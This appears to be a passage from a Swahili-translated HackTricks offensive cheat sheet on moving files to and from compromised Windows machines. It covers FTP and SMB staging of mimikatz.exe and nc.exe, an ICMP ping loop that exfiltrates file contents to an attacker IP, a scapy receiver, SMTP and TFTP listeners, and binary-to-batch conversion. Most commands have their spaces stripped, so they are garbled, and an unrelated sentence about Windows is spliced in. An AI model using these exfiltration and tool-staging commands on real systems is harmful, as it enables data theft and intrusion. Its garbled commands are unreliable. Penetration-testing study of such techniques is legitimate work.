#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Mteja wa Windows
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali kama server
kali_op1> impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2> smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Au tengeneza sehemu ya smb kwa kutumia samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Windows ni mfumo wa uendeshaji uliotengenezwa na Microsoft. Ni mojawapo ya mifumo maarufu zaidi duniani kwa kompyuta za kibinafsi.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind> netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1> New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2> cdnew_disk:
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Ikiwa unaweza kutuma data kwa seva ya SMTP, unaweza kuunda SMTP ili kupokea data na python:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Kwa chaguo-msingi katika XP na 2003 (katika wengine inahitaji kuongezwa wazi wakati wa usakinishaji)
Katika Kali, anzisha seva ya TFTP:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
Programu ya debug.exe sio tu inaruhusu ukaguzi wa binaries lakini pia ina uwezo wa kujenga upya kutoka hex. Hii inamaanisha kwamba kwa kutoa hex ya binary, debug.exe inaweza kuzalisha faili ya binary. Walakini, ni muhimu kufahamu kwamba debug.exe ina kizuizi cha kuunda faili hadi 64 kb in size.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Kisha nakili na kubandika maandishi kwenye windows-shell na faili inayoitwa nc.exe itaundwa.* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
## DNS* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)**Kikundi cha Usalama cha Kujaribu Kwa Bidii**<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
<div data-gb-custom-block data-tag="embed" data-url='https://discord.gg/tryhardsecurity'></div><div data-gb-custom-block data-tag="hint" data-style='success'>Jifunze & zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details><summary>Support HackTricks</summary>* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details></div>